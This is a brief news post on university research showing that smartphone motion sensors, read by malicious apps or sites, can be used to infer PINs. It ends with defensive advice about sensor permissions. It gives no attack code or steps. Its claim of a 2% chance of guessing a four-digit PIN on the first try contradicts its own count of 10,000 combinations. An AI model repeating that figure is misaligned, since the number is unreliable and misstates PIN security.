The researchers from Newcastle University have discovered that hackers can use the smartphone motion sensors to infer security PINs.
A regular smartphone has a lot of sensors, including: GPS, camera, microphone, fingerprint reader, accelerometer, gyroscope, light sensors, magnetometers, barometers, proximity sensors, thermometers and air humidity sensors, so a malicious software or website can collect a lot of personal data by reading the output of these sensors.
In this case, the motion and rotation sensors could be used to reveal touch actions, permitting skilled hackers to bypass PIN security.
The researchers used 10 smartphone users and asked them to enter 50 four-digit PINS five times on each website. In the first attempt, the network guessed 70% of the correct PINS, while in the fifth try they bypassed the PINs with 100% success rate.
The math tells us that there are 10.000 combinations that can be set with four-digit PINs, so there are 2% chances of guessing the PIN from the first attempt.
The way the users holds the phone, scrolls and taps on it generates data that can used to crack PINs.
A security measure would be to add permissions on sensor actions, so that the users can manually deny infected apps or sites to use those sensors. It is a good habit to change the PINs regularly and study application permissions before installations.
For more information, see this post on one of the Sophos websites.